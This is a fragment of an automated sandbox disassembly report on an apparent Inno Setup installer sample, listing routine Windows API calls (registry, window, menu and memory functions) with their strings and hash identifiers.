                                                                                      • Opcode ID: 593608dd5432025e5c10579cc54da45850a235723a39842afc18d8064d6d1a21
                                                                                      • Instruction ID: 6a74b67a3bdf66ca54efcfc0657381ecd904da166113fafb2436bbcb0ae12e28
                                                                                      • Opcode Fuzzy Hash: 593608dd5432025e5c10579cc54da45850a235723a39842afc18d8064d6d1a21
                                                                                      • Instruction Fuzzy Hash: E1117972600208AF8B00DEA9DC41EDFB7ECEB4D310B114566FD18D3212D638AD15CBA4
                                                                                      APIs
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,00477936,00000000,0047794C,?,?,?,?,00000000), ref: 00477712
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close
                                                                                      • String ID: RegisteredOrganization$RegisteredOwner
                                                                                      • API String ID: 3535843008-1113070880
                                                                                      • Opcode ID: 5da0313d24de2a72906f0e02df73607d497778b3bd604c1f31dadd7d7b78e1f2
                                                                                      • Instruction ID: 44da9ba76ca96eafcd406259b3cb4b8fe95da4c4325a64976e48815ca65e7baf
                                                                                      • Opcode Fuzzy Hash: 5da0313d24de2a72906f0e02df73607d497778b3bd604c1f31dadd7d7b78e1f2
                                                                                      • Instruction Fuzzy Hash: 94F0593470C244AFDB04D6A5EC52BAB3B9AD740308FA4807BA544CB391C67CBD05D74C
                                                                                      APIs
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004231B9
                                                                                      • LoadCursorA.USER32(00000000,00000000), ref: 004231E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CursorLoad
                                                                                      • String ID: EI
                                                                                      • API String ID: 3238433803-1715459816
                                                                                      • Opcode ID: cf7d116e50ce189f5790faa080c989bb411d79830bfeb1cde74da96b9f6355ff
                                                                                      • Instruction ID: e763212e35d88e91f52bf3e5ce882ef76e84b1945e438db40d164ba05c470673
                                                                                      • Opcode Fuzzy Hash: cf7d116e50ce189f5790faa080c989bb411d79830bfeb1cde74da96b9f6355ff
                                                                                      • Instruction Fuzzy Hash: 1DF0A7117001145BD620593E6CC1D3A72688F87736B61033BFE2AD72D1C62E2D51426D
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047117F), ref: 00470F6D
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,0047117F), ref: 00470F84
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateErrorFileHandleLast
                                                                                      • String ID: CreateFile
                                                                                      • API String ID: 2528220319-823142352
                                                                                      • Opcode ID: 8e17254768e76acdbc2e0aeec1a0314679b2821655cd6b60debc059c7f00f31f
                                                                                      • Instruction ID: 4dce3a0fb710f8058c99a71000b1262451dde5c1e1bb000cefd451e94b844243
                                                                                      • Opcode Fuzzy Hash: 8e17254768e76acdbc2e0aeec1a0314679b2821655cd6b60debc059c7f00f31f
                                                                                      • Instruction Fuzzy Hash: C4E06D74341304BFEA20E669DCC6F4977889B04728F108152FA48AF3E2C6F9EC408658
                                                                                      APIs
                                                                                      • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,TqI,00000004,00000001,?,0046B40F,?,?,00000000,0046B4F7,?,_is1,?), ref: 0046ADEF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID: NoModify$TqI
                                                                                      • API String ID: 3702945584-2484388882
                                                                                      • Opcode ID: f5a2910f86b5d4890aa6fcbcf0034d47aef96215c39c1bb137200c97013dc63d
                                                                                      • Instruction ID: 388a847686ab158aae351853834ee3a19678c554c0d9cb8fd514d48c61279f2c
                                                                                      • Opcode Fuzzy Hash: f5a2910f86b5d4890aa6fcbcf0034d47aef96215c39c1bb137200c97013dc63d
                                                                                      • Instruction Fuzzy Hash: F4E04FB0640704BFEB04DB55CD4AF6B77ACDB48714F104059BA08EB281E674FE10CA69
                                                                                      APIs
                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID: OG$System\CurrentControlSet\Control\Windows
                                                                                      • API String ID: 71445658-2870956291
                                                                                      • Opcode ID: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                                      • Instruction ID: fabb803f5ff523eeab3b7a035bb747b9213277980d9d81731b2bf545c5070290
                                                                                      • Opcode Fuzzy Hash: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                                      • Instruction Fuzzy Hash: EDD0C772910128BBDB10DA89DC41DF7775DDB59760F54401AFD0497141C1B4EC5197F4
                                                                                      APIs
                                                                                        • Part of subcall function 0042E1F0: SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                                        • Part of subcall function 0042E1F0: LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                                      • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 00468C65
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLibraryLoadModeProc
                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                      • API String ID: 2492108670-2683653824
                                                                                      • Opcode ID: 2242cd585e3a95cf47e04d02ab2c9cb54a1972a887a648b3717fd23610ab8d3e
                                                                                      • Instruction ID: f54d236eaa647a004fc156d77ac0774b12b8f86e94465ae50302f3b70839ea38
                                                                                      • Opcode Fuzzy Hash: 2242cd585e3a95cf47e04d02ab2c9cb54a1972a887a648b3717fd23610ab8d3e
                                                                                      • Instruction Fuzzy Hash: FDB092A064271082CE006BB2584271B22149750744B10C57FB040AA295EE7D88044FBE
                                                                                      APIs
                                                                                      • GetSystemMenu.USER32(00000000,00000000,00000000,0047C898), ref: 0047C830
                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0047C841
                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0047C859
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Append$System
                                                                                      • String ID:
                                                                                      • API String ID: 1489644407-0
                                                                                      • Opcode ID: 103ad35a9952b07d56bdb3bad9c34a645578be9cba599f62803875c0b4fd2168
                                                                                      • Instruction ID: 938ecdfec97688d9e91313a56ab48558b9b04f1f4dc78c4c1ee95835cae09dfe
                                                                                      • Opcode Fuzzy Hash: 103ad35a9952b07d56bdb3bad9c34a645578be9cba599f62803875c0b4fd2168
                                                                                      • Instruction Fuzzy Hash: BA31CF307143455AD710FB768CC2B9A3A989B51318F55947FF904AA2D3CA7C9C09C66E
                                                                                      APIs
                                                                                      • 73A0A570.USER32(00000000,?,00000000,00000000,0044AEC1,?,0047D0C7,?,?), ref: 0044AE35
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0044AE58
                                                                                      • 73A0A480.USER32(00000000,?,0044AE98,00000000,0044AE91,?,00000000,?,00000000,00000000,0044AEC1,?,0047D0C7,?,?), ref: 0044AE8B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A480A570ObjectSelect
                                                                                      • String ID:
                                                                                      • API String ID: 1230475511-0
                                                                                      • Opcode ID: 91444e5bf131007ac93604d47e6fc7e18e34c23fefa9c833d2c38518ec62aedf
                                                                                      • Instruction ID: 233d7bfbdcc25e67ff0a572e229f91d747dfb26028a93c536af8bc2826ebb7c8
                                                                                      • Opcode Fuzzy Hash: 91444e5bf131007ac93604d47e6fc7e18e34c23fefa9c833d2c38518ec62aedf
                                                                                      • Instruction Fuzzy Hash: D721B570E84208AFEB01DFA5C841B9F7BB9DB48304F51847AF504A6281C77C9950CB19
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044AB80,?,0047D0C7,?,?), ref: 0044AB52
                                                                                      • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044AB65
                                                                                      • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044AB99
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DrawText$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 65125430-0
                                                                                      • Opcode ID: 145cb60817e1461b02aba970f6a399deb92e78d362c3eca44f3c4fb02434d21d
                                                                                      • Instruction ID: de988064b5c118741e346c03ff1e8b17db840b4da88b1af59de34c2d8924ec6d
                                                                                      • Opcode Fuzzy Hash: 145cb60817e1461b02aba970f6a399deb92e78d362c3eca44f3c4fb02434d21d
                                                                                      • Instruction Fuzzy Hash: D811E6B27446447FE711DAAA8C81D6FB7EDDB88724F10413AF604E7280C6389E018669
                                                                                      APIs
                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424382
                                                                                      • TranslateMessage.USER32(?), ref: 004243FF
                                                                                      • DispatchMessageA.USER32(?), ref: 00424409
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4217535847-0
                                                                                      • Opcode ID: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                                      • Instruction ID: aef1b0206ccdbb2aa8587e86ea6dacd49c82d9c27d6d10fa8c02d352bba97142
                                                                                      • Opcode Fuzzy Hash: 4c72fe453077d3d5441811771d3c73f57da1beb0f02e586e781598996b195a0c
                                                                                      • Instruction Fuzzy Hash: 6F11543030432056DA20E665A94179B73D4DFC1B44F80886EF9DD97382D77D9D4987AA
                                                                                      APIs
                                                                                      • SetPropA.USER32(00000000,00000000), ref: 004165DA
                                                                                      • SetPropA.USER32(00000000,00000000), ref: 004165EF
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 00416616
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Prop$Window
                                                                                      • String ID:
                                                                                      • API String ID: 3363284559-0
                                                                                      • Opcode ID: 1283a2ba918a1a05b7609b6f7b848b7b983b1697ade3d6b61c1960e914505d94
                                                                                      • Instruction ID: 49560f5f00ee2c9135054c0b38937f4b9f373f0e35015079742173c5fde362c9
                                                                                      • Opcode Fuzzy Hash: 1283a2ba918a1a05b7609b6f7b848b7b983b1697ade3d6b61c1960e914505d94
                                                                                      • Instruction Fuzzy Hash: C3F0BD71701220BBEB10AB599C85FA632DCAB09715F16057ABE09EF286C778DC44C7A8
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFree
                                                                                      • String ID: d=d
                                                                                      • API String ID: 2087232378-2426951441
                                                                                      • Opcode ID: ac11951010fca1e09d027c43c8ed5b4b578696c80165eb8de0d03b95ec4bb515
                                                                                      • Instruction ID: 1d7fc67d8943aca9bd8b7424c3d760102f2274f63a1bf98f742a2cdc6a51162d
                                                                                      • Opcode Fuzzy Hash: ac11951010fca1e09d027c43c8ed5b4b578696c80165eb8de0d03b95ec4bb515
                                                                                      • Instruction Fuzzy Hash: 28F0A772B0073067EB605A6A4C81F5359C49FC5B94F154076FD0DFF3E9D6B58C0142A9
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 0041EDD4
                                                                                      • IsWindowEnabled.USER32(?), ref: 0041EDDE
                                                                                      • EnableWindow.USER32(?,00000000), ref: 0041EE04
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableEnabledVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3234591441-0
                                                                                      • Opcode ID: f1041f771c00274fafaec7c92c8c7bfa6f382932e423aeab5ff933265dcc9458
                                                                                      • Instruction ID: feef2f1e36016e7b5cf4fb144cadbc7ab6d373431457e94ba2eb74728d462d7d
                                                                                      • Opcode Fuzzy Hash: f1041f771c00274fafaec7c92c8c7bfa6f382932e423aeab5ff933265dcc9458
                                                                                      • Instruction Fuzzy Hash: B9E0E5B41003006BD711AF67DC85E57769CBB94314F568437AD0597793EA3ED8418AB8
                                                                                      APIs
                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,0040867A), ref: 00408563
                                                                                        • Part of subcall function 00406D54: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406D71
                                                                                        • Part of subcall function 004084D0: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004964C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                      • String ID: 1I
                                                                                      • API String ID: 1658689577-762079770
                                                                                      • Opcode ID: 6e8303e27ed7ddfbf6acd002e5c720f3c58af445dc5c20a44dc96457956c1da1
                                                                                      • Instruction ID: 74dcf24fece9135f842d9e2340cbc50c81b3ec91f87ebb2824f4d2ce1649f107
                                                                                      • Opcode Fuzzy Hash: 6e8303e27ed7ddfbf6acd002e5c720f3c58af445dc5c20a44dc96457956c1da1
                                                                                      • Instruction Fuzzy Hash: E7316375E00109ABCF00EF95C8819EEB7B9FF84314F118577E815BB285E738AE058B98
APIs
• SetActiveWindow.USER32(?), ref: 0047D150
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ActiveWindow
• String ID: InitializeWizard
• API String ID: 2558294473-2356795471
• Opcode ID: 669a6a269d9429eb07b4638d8b152cc205309fde65fa91bd383415d10fe050b9
• Instruction ID: 27c915d5e84757d1ee1c922a0b45ecd3517ff57706a6a9b1ea1830c72a43ed0f
• Opcode Fuzzy Hash: 669a6a269d9429eb07b4638d8b152cc205309fde65fa91bd383415d10fe050b9
• Instruction Fuzzy Hash: 9811C2306382009FD710EB29EC82B5A7BF5EB15724F50403BE808872A2DA39AC50CB5D
APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,00477812,00000000,0047794C), ref: 00477611
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 004775E1
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 225175c1cb3e5d3e9e70e9ef9a971fa01c6206b910d71101a0ac37fcff0035a7
• Instruction ID: 814c6dcea663d1405d948e9489940348151ed5d62cb49aab8d6aacd0da240b25
• Opcode Fuzzy Hash: 225175c1cb3e5d3e9e70e9ef9a971fa01c6206b910d71101a0ac37fcff0035a7
• Instruction Fuzzy Hash: C7F0A7317085146BDA00A65E6D42B9FA6DDCB84778F60443BF608EB346DABDDE0243AD
APIs
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,00497154,?,0046B06F,?,00000000,0046B4F7,?,_is1), ref: 0046AD8F
Strings
• Inno Setup: Setup Version, xrefs: 0046AD8D
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: Value
• String ID: Inno Setup: Setup Version
• API String ID: 3702945584-4166306022
• Opcode ID: b5001300976c311ff63bf81daa3498fb24628c1a8b44004d588d325ece062412
• Instruction ID: 411328d8211db58a77dae3404ef256999053971fa6961c2aedf3cbf650fcdf7d
• Opcode Fuzzy Hash: b5001300976c311ff63bf81daa3498fb24628c1a8b44004d588d325ece062412
• Instruction Fuzzy Hash: 7FE06D713016043FD710AA6ADC85F5BBADCDF88365F10403AB908EB392D578DD0085A9
APIs
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DA74
• RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DAE4
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
• Opcode ID: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
• Instruction ID: de7305fe23da407263f6a21fe748e6d6d926aae016943a7179aec9e2dd5a457b
• Opcode Fuzzy Hash: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
• Instruction Fuzzy Hash: 4F417171E04129AFDF10DF91D891BAFBBB8EB01704F918466E810B7240D778BE04CB99
APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
• RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DD8C
• RegCloseKey.ADVAPI32(?,0042DDFD,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DDF0
Memory Dump Source
